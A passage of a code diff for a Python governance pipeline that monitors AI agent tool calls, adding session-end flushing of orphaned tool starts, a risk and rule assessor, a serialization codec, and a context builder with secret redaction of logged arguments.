-                del self._pending[tool_call_id]
+                del self._pending[(event.session_id, tool_call_id)]
             else:
                 event = self._classify(event)
                 event = self._set_visibility(event)
 
             event = self._set_phase(event)
             return event
+
+        if event.kind == EventKind.SESSION_ENDED:
+            # Flush this session's still-buffered tool starts as orphans BEFORE the
+            # session-ended event. A governance stage finalizes and evicts session
+            # state on session.ended; without this, buffered unpaired starts would
+            # surface only at pipeline close (Enricher.flush) — i.e. after the
+            # session summary was already written — and be scored into a resurrected
+            # state that never gets finalized.
+            #
+            # This assumes session.ended is terminal for the session (the contract
+            # every supported adapter emits). A tool.call.completed arriving AFTER
+            # its own session.ended is a malformed stream: its start was already
+            # flushed+scored here, so the late completion would be observed a second
+            # time into a resurrected state. We do not carry per-session tombstones
+            # to dedup that case — it does not occur in well-formed input.
+            orphans = self._flush_session(event.session_id)
+            event = self._set_visibility(event)
+            event = self._set_phase(event)
+            return [*orphans, event] if orphans else event
 
         # Non-tool events: set visibility and phase, pass through
         event = self._set_visibility(event)
@@ -112,6 +148,20 @@ class Enricher:
             new_metadata = event.metadata.model_copy(update={"duration_ms": None})
             result.append(event.model_copy(update={"metadata": new_metadata}))
         self._pending.clear()
+        return result
+
+    def _flush_session(self, session_id: str) -> list[SessionEvent]:
+        """Emit and remove this session's buffered unpaired tool-starts as orphans.
+
+        Like :meth:`flush` but scoped to a single session — used to drain pending
+        starts the instant that session ends, rather than waiting for pipeline
+        close, so a governance stage sees them before it finalizes the session."""
+        result: list[SessionEvent] = []
+        for key, event in list(self._pending.items()):
+            if event.session_id == session_id:
+                new_metadata = event.metadata.model_copy(update={"duration_ms": None})
+                result.append(event.model_copy(update={"metadata": new_metadata}))
+                del self._pending[key]
         return result
 
     # --- Private helpers ---

--- a/src/tracemill/governance/__init__.py
+++ b/src/tracemill/governance/__init__.py
@@ -17,11 +17,10 @@ from tracemill.governance.state import (
 )
 from tracemill.governance.persistence import SystemStore
 from tracemill.governance.labeler import GovernanceLabeler, GovernanceResult
-from tracemill.governance.pipeline import (
+from tracemill.governance.results import (
     Evidence,
     EvidencePointer,
     EscalationContext,
-    GovernancePipeline,
     Phase3Result,
     RecommendedAction,
     RecommendationResult,
@@ -29,6 +28,7 @@ from tracemill.governance.pipeline import (
     SessionMeta,
     TransformSuggestion,
 )
+from tracemill.governance.pipeline import GovernancePipeline
 from tracemill.governance.rules import (
     Predicate,
     Rule,

--- a/src/tracemill/governance/assessor.py
+++ b/src/tracemill/governance/assessor.py
@@ -1,0 +1,312 @@
+"""Phase 2/3 assessment — side-effect-free labeling, risk, rules and evidence.
+
+The :class:`Assessor` is the governance pipeline's *assessment* collaborator. Given
+an :class:`EnrichmentContext` and a Phase-1 :class:`SessionStateSnapshot`, it produces
+an :class:`Assessment` (a :class:`SessionMeta` plus any deferred MCP write prescriptions)
+without mutating session state or touching the store. It is pure with respect to the
+snapshot it is handed, which is what lets both the runtime monitor (post-commit) and the
+shield's preflight simulation share exactly one assessment path.
+"""
+
+from __future__ import annotations
+
+from dataclasses import dataclass, field
+from typing import TYPE_CHECKING, Protocol
+
+from tracemill.governance.results import (
+    Evidence,
+    EvidencePointer,
+    EscalationContext,
+    Phase3Result,
+    RecommendationResult,
+    RecommendedAction,
+    RiskRecommendation,
+    SessionMeta,
+    TransformSuggestion,
+)
+
+if TYPE_CHECKING:
+    from tracemill.classify.config import ClassificationEngine
+    from tracemill.governance.labeler import GovernanceLabeler, GovernanceResult
+    from tracemill.governance.rules import Rule
+    from tracemill.governance.state import SessionStateSnapshot
+    from tracemill.governance.types import EnrichmentContext
+
+
+@dataclass(frozen=True)
+class Assessment:
+    """Result of a side-effect-free Phase 2/3 assessment.
+
+    ``meta`` is the caller-facing verdict surface (classification + risk +
+    recommendation + evidence). ``mcp_deferred_writes`` carries the MCP fingerprint
+    write prescriptions emitted during labeling, which the writer persists *after*
+    finalization commits — the assessor itself never writes them.
+    """
+
+    meta: SessionMeta
+    mcp_deferred_writes: tuple = field(default_factory=tuple)
+
+
+class Assessor(Protocol):
+    """Runs side-effect-free Phase 2/3 assessment against a state snapshot."""
+
+    def assess(self, ctx: "EnrichmentContext", snapshot: "SessionStateSnapshot") -> Assessment: ...
+
+
+class DefaultAssessor:
+    """Default assessor: Phase 2 labeling + Phase 3 risk / rules / evidence.
+
+    Depends only on the label + risk collaborators (labeler, rules, engine); it holds
+    no session state and performs no persistence. Swap it out (OCP) to change how
+    events are labeled or scored without touching the monitor or shield.
+    """
+
+    def __init__(
+        self,
+        labeler: "GovernanceLabeler",
+        rules: "list[Rule]",
+        engine: "ClassificationEngine",
+    ) -> None:
+        self._labeler = labeler
+        self._rules = rules
+        self._engine = engine
+
+    def assess(self, ctx: "EnrichmentContext", snapshot: "SessionStateSnapshot") -> Assessment:
+        """Label (Phase 2) then score/evaluate/evidence (Phase 3) against ``snapshot``."""
+        enrichment_ctx = self._with_snapshot(ctx, snapshot)
+
+        gov_result = self._labeler.label(enrichment_ctx)
+        phase3 = self._phase3(enrichment_ctx, gov_result, snapshot)
+
+        rec = None
+        evidence = None
+        if phase3.recommendation_result:
+            rec = phase3.recommendation_result.recommendation
+            evidence = phase3.recommendation_result.evidence
+
+        meta = SessionMeta(
+            classification=gov_result.classification,
+            risk_assessment=phase3.risk_assessment,
+            recommendation=rec,
+            budget_snapshot=snapshot.budget,
+            drift=gov_result.drift_result,
+            mcp_alerts=gov_result.mcp_alerts,
+            evidence=evidence,
+        )
+        return Assessment(meta=meta, mcp_deferred_writes=gov_result.mcp_deferred_writes)
+
+    def _with_snapshot(
+        self, ctx: "EnrichmentContext", snapshot: "SessionStateSnapshot"
+    ) -> "EnrichmentContext":
+        """Create new context with session state snapshot."""
+        import dataclasses
+
+        return dataclasses.replace(ctx, session_state=snapshot)
+
+    def _phase3(
+        self,
+        ctx: "EnrichmentContext",
+        result: "GovernanceResult",
+        snapshot: "SessionStateSnapshot" = None,
+    ) -> Phase3Result:
+        """Phase 3: risk assessment + rule evaluation + evidence + escalation context."""
+        from tracemill.governance.canonical import compute_canonical_hash
+        from tracemill.governance.risk_wrapper import assess_governance_risk
+        from tracemill.governance.rules import evaluate_rules
+
+        # Compute risk
+        risk = assess_governance_risk(
+            enriched_classification=result.classification,
+            command_analysis=ctx.command_analysis,
+            risk_modifiers=result.risk_modifiers,
+            engine=self._engine,
+            project_root=ctx.project_root,
+        )
+
+        # Evaluate rules
+        rule_match = evaluate_rules(self._rules, result.classification, risk)
+
+        if rule_match is None:
+            return Phase3Result(risk_assessment=risk, recommendation_result=None)
+
+        # Compute canonical hash
+        command = ctx.command_analysis.command if ctx.command_analysis else None
+        canonical_id = compute_canonical_hash(
+            result.classification,
+            command=command,
+            reason_code=rule_match.template.reason_code,
+        )
+
+        # Render transform suggestion (if template provided)
+        transform = self._render_transform(rule_match.template.transform, ctx)
+
+        # Build recommendation
+        recommendation = RiskRecommendation(
+            recommended_action=RecommendedAction(rule_match.template.recommended_action),
+            assessment=risk,
+            reason_code=rule_match.template.reason_code,
+            canonical_id=canonical_id,
+            message=rule_match.template.message,
+            transform=transform,
+        )
+
+        # Build evidence for non-allow actions
+        evidence = None
+        if recommendation.recommended_action in (
+            RecommendedAction.WARN,
+            RecommendedAction.ESCALATE,
+            RecommendedAction.DENY,
+        ):
+            # Build EscalationContext for escalate/deny
+            escalation = None
+            if recommendation.recommended_action in (
+                RecommendedAction.ESCALATE,
+                RecommendedAction.DENY,
+            ):
+                escalation = self._build_escalation(
+                    ctx,
+                    result,
+                    risk,
+                    recommendation,
+                    canonical_id,
+                    snapshot,
+                )
+
+            evidence = Evidence(
+                canonical_id=canonical_id,
+                timestamp=ctx.event.timestamp,
+                session_id=ctx.event.session_id,
+                mechanism=result.classification.mechanism,
+                effect=result.classification.effect,
+                scope=tuple(sorted(result.classification.scope)),
+                role=tuple(sorted(result.classification.role)),
+                action=tuple(sorted(result.classification.action)),
+                capability=tuple(sorted(result.classification.capability)),
+                structure=tuple(sorted(result.classification.structure)),
+                source_labels=tuple(sorted(result.classification.source_labels)),
+                recommended_action=recommendation.recommended_action,
+                risk_score=risk.score,
+                risk_factors=risk.factors,
+                mitre_techniques=risk.mitre,
+                pointers=(
+                    EvidencePointer(
+                        event_id=ctx.event.event_id,
+                        rule_id=rule_match.rule_id,
+                        detector="rule_engine",
+                    ),
+                ),
+                escalation=escalation,
+            )
+
+        return Phase3Result(
+            risk_assessment=risk,
+            recommendation_result=RecommendationResult(
+                recommendation=recommendation,
+                evidence=evidence,
+            ),
+        )
+
+    def _render_transform(self, template, ctx: "EnrichmentContext") -> TransformSuggestion | None:
+        """Render TransformTemplate → TransformSuggestion using event data.
+
+        Returns None if target cannot be located in event data.
+        """
+        if template is None:
+            return None
+
+        from tracemill.governance.types import ToolCallEvent
+        import logging
+
+        try:
+            if isinstance(ctx.event, ToolCallEvent) and ctx.command_analysis:
+                original = ctx.command_analysis.command or ""
+                replacement = template.replacement if template.replacement is not None else None
+                return TransformSuggestion(
+                    target_kind="shell_arg",
+                    path=f"command[0:{len(original)}]",
+                    original=original,
+                    replacement=replacement,
+                    rationale=template.description or "Rule suggests transformation",
+                    confidence="medium",
+                )
+            elif isinstance(ctx.event, ToolCallEvent):
+                args_str = ctx.event.tool_args_json
+                return TransformSuggestion(
+                    target_kind="tool_arg",
+                    path="$.args",
+                    original=args_str[:200],
+                    replacement=None,
+                    rationale=template.description or "Rule suggests transformation",
+                    confidence="low",
+                )
+        except (KeyError, AttributeError, TypeError) as e:
+            logging.getLogger(__name__).debug(
+                "Transform rendering failed for template %s: %s", template, e
+            )
+        return None
+
+    def _build_escalation(
+        self,
+        ctx: "EnrichmentContext",
+        result: "GovernanceResult",
+        risk,
+        recommendation,
+        canonical_id: str,
+        snapshot,
+    ) -> EscalationContext:
+        """Build full EscalationContext for escalate/deny recommendations."""
+        from tracemill.governance.types import ToolCallEvent
+
+        tool_name = ""
+        tool_args_summary = ""
+        if isinstance(ctx.event, ToolCallEvent):
+            tool_name = ctx.event.tool_name or ""
+            # Sanitize args — truncate and remove obvious secrets
+            raw_args = ctx.event.tool_args_json or ""
+            tool_args_summary = self._sanitize_args(raw_args)
+
+        pii_taint = (
+            "pii_exposure" in result.classification.capability
+            or "credential_exposure" in result.classification.capability
+        )
+        ifc_violations = result.risk_modifiers.ifc_violations
+
+        budget = snapshot.budget if snapshot else None
+
+        return EscalationContext(
+            canonical_id=canonical_id,
+            classification=result.classification,
+            recommended_action=recommendation.recommended_action,
+            reason_code=recommendation.reason_code,
+            mitre_techniques=risk.mitre,
+            drift=result.drift_result,
+            budget_snapshot=budget,
+            pii_taint=pii_taint,
+            ifc_violations=ifc_violations,
+            tool_name=tool_name,
+            tool_args_summary=tool_args_summary,
+            session_id=ctx.event.session_id,
+            timestamp=ctx.event.timestamp,
+        )
+
+    def _sanitize_args(self, raw_args: str, max_len: int = 500) -> str:
+        """Sanitize tool args for escalation context — remove secrets, truncate."""
+        import re
+
+        # Word-boundary anchored to avoid matching "monkey", "turkey", "keyboard" etc.
+        _SENSITIVE_KEYS = r"(?<![a-zA-Z])(?:password|secret|token|api_key|credential|auth|authorization)(?![a-zA-Z])"
+        # Handle JSON-style: "key": "value" or "key":"value"
+        sanitized = re.sub(
+            r'(?i)(["\']?(?:' + _SENSITIVE_KEYS + r')["\']?\s*[:=]\s*)["\']([^"\']*)["\']',
+            r'\1"<REDACTED>"',
+            raw_args,
+        )
+        # Handle bare (non-quoted) values: key=value or key: value (no quotes around value)
+        sanitized = re.sub(
+            r"(?i)((?:" + _SENSITIVE_KEYS + r')\s*[:=]\s*)([^\s"\'}{,\]\)]+)',
+            r"\1<REDACTED>",
+            sanitized,
+        )
+        if len(sanitized) > max_len:
+            sanitized = sanitized[:max_len] + "..."
+        return sanitized

--- a/src/tracemill/governance/codec.py
+++ b/src/tracemill/governance/codec.py
@@ -1,0 +1,406 @@
+"""Persistence codec for governance value objects.
+
+Bidirectional mapping between :class:`SessionMeta` / ``SessionStateSnapshot`` and the
+JSON-able dicts persisted in the idempotency and audit store. Pure and stateless:
+it owns no store handle and no session residency, only the structural
+(de)serialization the monitor and scorer depend on.
+"""
+
+from __future__ import annotations
+
+from datetime import datetime, timezone
+from typing import TYPE_CHECKING
+
+from tracemill.governance.results import (
+    Evidence,
+    EvidencePointer,
+    EscalationContext,
+    RecommendedAction,
+    RiskRecommendation,
+    SessionMeta,
+    TransformSuggestion,
+)
+
+if TYPE_CHECKING:
+    from tracemill.governance.state import SessionStateSnapshot
+
+
+def _decode_budget_dims(raw: list | None) -> tuple[tuple[str, int], ...]:
+    """Safely decode budget dimension pairs from JSON, skipping malformed entries."""
+    if not raw:
+        return ()
+    result = []
+    for item in raw:
+        if isinstance(item, (list, tuple)) and len(item) == 2:
+            key, val = item
+            if isinstance(key, str) and isinstance(val, (int, float)):
+                result.append((key, int(val)))
+    return tuple(result)
+
+
+class MetaCodec:
+    """Serialize and deserialize governance value objects for durable storage."""
+
+    def serialize_snapshot(self, snapshot: "SessionStateSnapshot") -> dict:
+        """Serialize Phase-1 snapshot for reservation persistence."""
+        return {
+            "budget": {
+                "total_tool_calls": snapshot.budget.total_tool_calls,
+                "total_tokens": snapshot.budget.total_tokens,
+                "elapsed_seconds": snapshot.budget.elapsed_seconds,
+                "pressure": snapshot.budget.pressure,
+                "by_effect": list(snapshot.budget.by_effect),
+                "by_capability": list(snapshot.budget.by_capability),
+                "by_scope": list(snapshot.budget.by_scope),
+                "by_role": list(snapshot.budget.by_role),
+                "by_phase": list(snapshot.budget.by_phase),
+                "by_mechanism": list(snapshot.budget.by_mechanism),
+                "by_action": list(snapshot.budget.by_action),
+                "by_structure": list(snapshot.budget.by_structure),
+            },
+            "phase_window": list(snapshot.phase_window),
+            "taint_ledger": [
+                {
+                    "event_id": t.event_id,
+                    "source_event_key": t.source_event_key,
+                    "clearance": t.clearance,
+                    "source": t.source,
+                    "payload_pointer": t.payload_pointer,
+                }
+                for t in snapshot.taint_ledger
+            ],
+            "last_assistant_event_id": snapshot.last_assistant_event_id,
+            "last_user_event_id": snapshot.last_user_event_id,
+            "event_count": snapshot.event_count,
+            "dropped_events": snapshot.dropped_events,
+            "last_sequence": snapshot.last_sequence,
+            "gap_ordinal": snapshot.gap_ordinal,
+        }
+
+    def deserialize_snapshot(self, data: dict) -> "SessionStateSnapshot":
+        """Reconstruct snapshot from persisted reservation."""
+        from tracemill.governance.state import BudgetSnapshot, SessionStateSnapshot, TaintEntry
+
+        budget_data = data.get("budget", {})
+        budget = BudgetSnapshot(
+            total_tool_calls=budget_data.get("total_tool_calls", 0),
+            total_tokens=budget_data.get("total_tokens", 0),
+            elapsed_seconds=budget_data.get("elapsed_seconds", 0.0),
+            by_effect=_decode_budget_dims(budget_data.get("by_effect", ())),
+            by_capability=_decode_budget_dims(budget_data.get("by_capability", ())),
+            by_scope=_decode_budget_dims(budget_data.get("by_scope", ())),
+            by_role=_decode_budget_dims(budget_data.get("by_role", ())),
+            by_phase=_decode_budget_dims(budget_data.get("by_phase", ())),
+            by_mechanism=_decode_budget_dims(budget_data.get("by_mechanism", ())),
+            by_action=_decode_budget_dims(budget_data.get("by_action", ())),
+            by_structure=_decode_budget_dims(budget_data.get("by_structure", ())),
+            pressure=budget_data.get("pressure", False),
+        )
+        taints = tuple(
+            TaintEntry(
+                event_id=t["event_id"],
+                source_event_key=t.get("source_event_key") or t["event_id"],
+                clearance=t["clearance"],
+                source=t["source"],
+                payload_pointer=t["payload_pointer"],
+            )
+            for t in data.get("taint_ledger", ())
+        )
+        return SessionStateSnapshot(
+            budget=budget,
+            phase_window=tuple(data.get("phase_window", ())),
+            taint_ledger=taints,
+            last_assistant_event_id=data.get("last_assistant_event_id"),
+            last_user_event_id=data.get("last_user_event_id"),
+            event_count=data.get("event_count", 0),
+            dropped_events=data.get("dropped_events", 0),
+            last_sequence=data.get("last_sequence"),
+            gap_ordinal=data.get("gap_ordinal", 0),
+        )
+
+    def deserialize_escalation(self, data: dict | None) -> "EscalationContext | None":
+        """Reconstruct EscalationContext from cached evidence data."""
+        if not data:
+            return None
+        from tracemill.classify.core import Classification
+
+        cls = (
+            Classification.from_dict(data["classification"]) if data.get("classification") else None
+        )
+        action_val = data.get("recommended_action", "allow")
+        action = (
+            RecommendedAction(action_val)
+            if action_val in tuple(RecommendedAction)
+            else RecommendedAction.ALLOW
+        )
+        return EscalationContext(
+            canonical_id=data.get("canonical_id", ""),
+            classification=cls,
+            recommended_action=action,
+            reason_code=data.get("reason_code", ""),
+            mitre_techniques=tuple(data.get("mitre_techniques", ())),
+            drift=None,  # Drift is session-contextual, not cached
+            budget_snapshot=None,
+            pii_taint=data.get("pii_taint", False),
+            ifc_violations=data.get("ifc_violations", 0),
+            tool_name=data.get("tool_name", ""),
+            tool_args_summary=data.get("tool_args_summary", ""),
+            session_id=data.get("session_id", ""),
+            timestamp=datetime.fromisoformat(data["timestamp"])
+            if data.get("timestamp")
+            else datetime.now(timezone.utc),
+        )
+
+    def serialize_meta(self, meta: SessionMeta) -> dict:
+        """Full serialization for idempotency cache — preserves all governance decisions."""
+        rec_data = None
+        if meta.recommendation:
+            transform_data = None
+            if meta.recommendation.transform:
+                transform_data = {
+                    "target_kind": meta.recommendation.transform.target_kind,
+                    "path": meta.recommendation.transform.path,
+                    "original": meta.recommendation.transform.original,
+                    "replacement": meta.recommendation.transform.replacement,
+                    "rationale": meta.recommendation.transform.rationale,
+                    "confidence": meta.recommendation.transform.confidence,
+                }
+            rec_data = {
+                "action": str(meta.recommendation.recommended_action),
+                "reason_code": meta.recommendation.reason_code,
+                "canonical_id": meta.recommendation.canonical_id,
+                "message": meta.recommendation.message,
+                "transform": transform_data,
+            }
+        risk_data = None
+        if meta.risk_assessment:
+            risk_data = {
+                "score": meta.risk_assessment.score,
+                "level": meta.risk_assessment.level,
+                "confidence": meta.risk_assessment.confidence,
+                "factors": list(meta.risk_assessment.factors),
+                "mitre": list(meta.risk_assessment.mitre),
+            }
+        cls_data = None
+        if meta.classification:
+            cls_data = meta.classification.to_dict()
+        budget_data = None
+        if meta.budget_snapshot:
+            budget_data = {
+                "total_tool_calls": meta.budget_snapshot.total_tool_calls,
+                "total_tokens": meta.budget_snapshot.total_tokens,
+                "elapsed_seconds": meta.budget_snapshot.elapsed_seconds,
+                "pressure": meta.budget_snapshot.pressure,
+                "by_effect": list(meta.budget_snapshot.by_effect),
+                "by_capability": list(meta.budget_snapshot.by_capability),
+                "by_scope": list(meta.budget_snapshot.by_scope),
+                "by_role": list(meta.budget_snapshot.by_role),
+                "by_phase": list(meta.budget_snapshot.by_phase),
+                "by_mechanism": list(meta.budget_snapshot.by_mechanism),
+                "by_action": list(meta.budget_snapshot.by_action),
+                "by_structure": list(meta.budget_snapshot.by_structure),
+            }
+        evidence_data = None
+        if meta.evidence:
+            pointers_data = [
+                {
+                    "event_id": p.event_id,
+                    "rule_id": p.rule_id,
+                    "detector": p.detector,
+                    "payload_pointer": p.payload_pointer,
+                }
+                for p in meta.evidence.pointers
+            ]
+            evidence_data = {
+                "canonical_id": meta.evidence.canonical_id,
+                "timestamp": meta.evidence.timestamp.isoformat(),
+                "session_id": meta.evidence.session_id,
+                "mechanism": meta.evidence.mechanism,
+                "effect": meta.evidence.effect,
+                "scope": list(meta.evidence.scope),
+                "role": list(meta.evidence.role),
+                "action": list(meta.evidence.action),
+                "capability": list(meta.evidence.capability),
+                "structure": list(meta.evidence.structure),
+                "source_labels": list(meta.evidence.source_labels),
+                "recommended_action": str(meta.evidence.recommended_action),
+                "risk_score": meta.evidence.risk_score,
+                "risk_factors": list(meta.evidence.risk_factors),
+                "mitre_techniques": list(meta.evidence.mitre_techniques),
+                "pointers": pointers_data,
+            }
+            if meta.evidence.escalation:
+                esc = meta.evidence.escalation
+                evidence_data["escalation"] = {
+                    "canonical_id": esc.canonical_id,
+                    "classification": esc.classification.to_dict() if esc.classification else None,
+                    "recommended_action": str(esc.recommended_action),
+                    "reason_code": esc.reason_code,
+                    "mitre_techniques": list(esc.mitre_techniques),
+                    "pii_taint": esc.pii_taint,
+                    "ifc_violations": esc.ifc_violations,
+                    "tool_name": esc.tool_name,
+                    "tool_args_summary": esc.tool_args_summary,
+                    "session_id": esc.session_id,
+                    "timestamp": esc.timestamp.isoformat(),
+                }
+        mcp_alerts_data = []
+        if meta.mcp_alerts:
+            for alert in meta.mcp_alerts:
+                mcp_alerts_data.append(
+                    {
+                        "tool_name": alert.tool_name,
+                        "server": alert.server,
+                        "alert_type": alert.alert_type,
+                        "previous": alert.previous,
+                        "current": alert.current,
+                        "severity": alert.severity,
+                        "timestamp": alert.timestamp.isoformat(),
+                    }
+                )
+        return {
+            "classification": cls_data,
+            "recommendation": rec_data,
+            "risk": risk_data,
+            "budget": budget_data,
+            "evidence": evidence_data,
+            "mcp_alerts": mcp_alerts_data,
+        }
+
+    def deserialize_meta(self, data: dict) -> SessionMeta:
+        """Reconstruct SessionMeta from cache — full fidelity for idempotent output."""
+        from tracemill.classify.core import Classification
+        from tracemill.classify.risk import RiskAssessment
+        from tracemill.governance.state import BudgetSnapshot
+
+        risk = None
+        risk_data = data.get("risk")
+        if risk_data:
+            risk = RiskAssessment(
+                score=risk_data.get("score", 0),
+                level=risk_data.get("level", "safe"),
+                confidence=risk_data.get("confidence", "medium"),
+                factors=tuple(risk_data.get("factors", ())),
+                mitre=tuple(risk_data.get("mitre", ())),
+                version="cached",
+            )
+
+        rec = None
+        rec_data = data.get("recommendation")
+        if rec_data and rec_data.get("action"):
+            transform = None
+            transform_data = rec_data.get("transform")
+            if transform_data:
+                transform = TransformSuggestion(
+                    target_kind=transform_data["target_kind"],
+                    path=transform_data["path"],
+                    original=transform_data["original"],
+                    replacement=transform_data.get("replacement"),
+                    rationale=transform_data.get("rationale", ""),
+                    confidence=transform_data.get("confidence", "medium"),
+                )
+            # Only construct recommendation if risk is available (type contract)
+            if risk is not None:
+                rec = RiskRecommendation(
+                    recommended_action=RecommendedAction(rec_data["action"]),
+                    assessment=risk,
+                    reason_code=rec_data.get("reason_code", ""),
+                    canonical_id=rec_data.get("canonical_id") or "",
+                    message=rec_data.get("message"),
+                    transform=transform,
+                )
+
+        cls = None
+        cls_data = data.get("classification")
+        if cls_data:
+            cls = Classification.from_dict(cls_data)
+
+        budget = None
+        budget_data = data.get("budget")
+        if budget_data:
+            budget = BudgetSnapshot(
+                total_tool_calls=budget_data.get("total_tool_calls", 0),
+                total_tokens=budget_data.get("total_tokens", 0),
+                elapsed_seconds=budget_data.get("elapsed_seconds", 0.0),
+                by_effect=_decode_budget_dims(budget_data.get("by_effect", ())),
+                by_capability=_decode_budget_dims(budget_data.get("by_capability", ())),
+                by_scope=_decode_budget_dims(budget_data.get("by_scope", ())),
+                by_role=_decode_budget_dims(budget_data.get("by_role", ())),
+                by_phase=_decode_budget_dims(budget_data.get("by_phase", ())),
+                by_mechanism=_decode_budget_dims(budget_data.get("by_mechanism", ())),
+                by_action=_decode_budget_dims(budget_data.get("by_action", ())),
+                by_structure=_decode_budget_dims(budget_data.get("by_structure", ())),
+                pressure=budget_data.get("pressure", False),
+            )
+
+        evidence = None
+        evidence_data = data.get("evidence")
+        if evidence_data:
+            from datetime import datetime as dt_cls
+
+            pointers = tuple(
+                EvidencePointer(
+                    event_id=p["event_id"],
+                    rule_id=p["rule_id"],
+                    detector=p["detector"],
+                    payload_pointer=p.get("payload_pointer"),
+                )
+                for p in evidence_data.get("pointers", ())
+            )
+            evidence = Evidence(
+                canonical_id=evidence_data.get("canonical_id", ""),
+                timestamp=dt_cls.fromisoformat(evidence_data["timestamp"])
+                if evidence_data.get("timestamp")
+                else datetime.now(timezone.utc),
+                session_id=evidence_data.get("session_id", ""),
+                mechanism=evidence_data.get("mechanism", ""),
+                effect=evidence_data.get("effect"),
+                scope=tuple(evidence_data.get("scope", ())),
+                role=tuple(evidence_data.get("role", ())),
+                action=tuple(evidence_data.get("action", ())),
+                capability=tuple(evidence_data.get("capability", ())),
+                structure=tuple(evidence_data.get("structure", ())),
+                source_labels=tuple(evidence_data.get("source_labels", ())),
+                recommended_action=RecommendedAction(evidence_data["recommended_action"])
+                if evidence_data.get("recommended_action") in tuple(RecommendedAction)
+                else RecommendedAction.ALLOW,
+                risk_score=evidence_data.get("risk_score", 0),
+                risk_factors=tuple(evidence_data.get("risk_factors", ())),
+                mitre_techniques=tuple(evidence_data.get("mitre_techniques", ())),
+                pointers=pointers,
+                escalation=self.deserialize_escalation(evidence_data.get("escalation")),
+            )
+
+        from tracemill.governance.mcp_drift import MCPIntegrityAlert
+
+        mcp_alerts_raw = data.get("mcp_alerts", ())
+        mcp_alerts: tuple = ()
+        if mcp_alerts_raw:
+            alerts_list = []
+            for a in mcp_alerts_raw:
+                if isinstance(a, dict):
+                    alerts_list.append(
+                        MCPIntegrityAlert(
+                            tool_name=a.get("tool_name", ""),
+                            server=a.get("server", ""),
+                            alert_type=a.get("alert_type", "schema_change"),
+                            previous=a.get("previous", ""),
+                            current=a.get("current", ""),
+                            severity=a.get("severity", "info"),
+                            timestamp=datetime.fromisoformat(a["timestamp"])
+                            if a.get("timestamp")
+                            else datetime.now(timezone.utc),
+                        )
+                    )
+                # Legacy string alerts: skip (can't reconstruct typed object)
+            mcp_alerts = tuple(alerts_list)
+
+        return SessionMeta(
+            classification=cls,
+            risk_assessment=risk,
+            recommendation=rec,
+            budget_snapshot=budget,
+            drift=None,
+            mcp_alerts=mcp_alerts,
+            evidence=evidence,
+        )

--- a/src/tracemill/governance/context.py
+++ b/src/tracemill/governance/context.py
@@ -1,0 +1,249 @@
+"""Translate raw event shapes into a governance EnrichmentContext.
+
+ContextBuilder is the adapter seam between the outside world's event shapes
+(SessionEvent from the observation pipeline; ToolCallEvent from the assess API)
+and the internal EnrichmentContext the Assessor and monitor consume. It is a
+pure translator: it holds only the classification engine and the project root,
+mutates no session state, and never touches the store.
+"""
+
+from __future__ import annotations
+
+from typing import TYPE_CHECKING, Literal
+
+if TYPE_CHECKING:
+    import tracemill.types
+
+    from tracemill.classify.config import ClassificationEngine
+    from tracemill.governance.types import EnrichmentContext, ToolCallEvent
+
+
+class ContextBuilder:
+    """Build an EnrichmentContext from raw SessionEvent / ToolCallEvent inputs."""
+
+    def __init__(self, engine: "ClassificationEngine", project_root: str | None = None) -> None:
+        self._engine = engine
+        self._project_root = project_root
+
+    def from_session_event(self, event: "tracemill.types.SessionEvent") -> "EnrichmentContext":
+        """Bridge: convert an enriched SessionEvent (from adapters/Enricher) into an EnrichmentContext.
+
+        This is the canonical path for observation pipeline events. The Enricher
+        has already classified the event and stored the result in event.metadata.
+        We extract that classification and build the governance context.
+        """
+        from tracemill.governance.types import EnrichmentContext, ToolCallEvent
+
+        # Normalize metadata: events may arrive with metadata=None (e.g. pushed
+        # directly, bypassing the Enricher). Fall back to an empty EventMetadata so
+        # attribute access below never raises.
+        metadata = event.metadata
+        if metadata is None:
+            from tracemill.types import EventMetadata
+
+            metadata = EventMetadata()
+
+        # Extract classification (already computed by Enricher)
+        classification = metadata.classification
+        if classification is None:
+            from tracemill.classify.core import Classification, Mechanism
+
+            classification = Classification(mechanism=Mechanism.UNKNOWN, effect=None)
+
+        # Build governance ToolCallEvent from SessionEvent fields
+        tool_name = event.payload.get("tool_name", "")
+        arguments = event.payload.get("arguments", {})
+        server_namespace = event.payload.get("server_namespace")
+
+        import json as _json
+
+        tool_args_json = (
+            _json.dumps(arguments, default=str) if isinstance(arguments, dict) else str(arguments)
+        )
+
+        gov_event = ToolCallEvent(
+            event_id=event.id,
+            session_id=event.session_id,
+            timestamp=event.timestamp,
+            source_event_key=event.id,
+            span_id=metadata.span_id or event.id,
+            tool_name=tool_name,
+            server_namespace=server_namespace,
+            tool_args_json=tool_args_json,
+            source_event_id=None,
+            mcp_server_name=event.payload.get("mcp_server_name") or server_namespace,
+            tool_description=event.payload.get("tool_description"),
+            tool_schema_json=event.payload.get("tool_schema_json"),
+        )
+
+        # Build command analysis for shell tools
+        command = ""
+        if isinstance(arguments, dict):
+            command = arguments.get("command", "") or arguments.get("cmd", "")
+        elif isinstance(arguments, str):
+            command = arguments
+        command_analysis = self._build_command_analysis(command) if command else None
+
+        # Derive engine literal
+        mech_str = (
+            classification.mechanism.value
+            if hasattr(classification.mechanism, "value")
+            else str(classification.mechanism)
+        ).lower()
+        if "shell" in mech_str or "process" in mech_str:
+            engine_literal: Literal["shell", "mcp", "coding"] = "shell"
+        elif "mcp" in mech_str:
+            engine_literal = "mcp"
+        else:
+            engine_literal = "coding"
+
+        return EnrichmentContext(
+            event=gov_event,
+            base_classification=classification,
+            command_analysis=command_analysis,
+            session_state=None,
+            mcp_profiles=None,
+            project_root=self._project_root,
+            engine=engine_literal,
+            drift_baseline=None,
+            mcp_profile_key=server_namespace,
+        )
+
+    def from_tool_call(self, event: "ToolCallEvent") -> "EnrichmentContext":
+        """Classify a governance ToolCallEvent and build its EnrichmentContext.
+
+        Used by the assess pathway (raw dict → ToolCallEvent.from_dict → here).
+        For observation pipeline events, use from_session_event instead.
+        """
+        import json as _json
+
+        from tracemill.classify.tools import classify_tool, normalize_tool_name
+        from tracemill.governance.types import EnrichmentContext
+
+        tool_name = event.tool_name
+        server_namespace = event.server_namespace
+
+        # MCP namespace synthesis
+        classify_name = tool_name
+        if server_namespace and not tool_name.startswith("mcp__"):
+            prefix = f"{server_namespace}__"
+            base = tool_name[len(prefix) :] if tool_name.startswith(prefix) else tool_name
+            classify_name = f"mcp__{server_namespace}__{base}"
+
+        canonical = normalize_tool_name(classify_name, engine=self._engine)
+        is_shell = canonical == "shell"
+
+        if is_shell:
+            tool_input = _json.loads(event.tool_args_json) if event.tool_args_json else {}
+            command = (
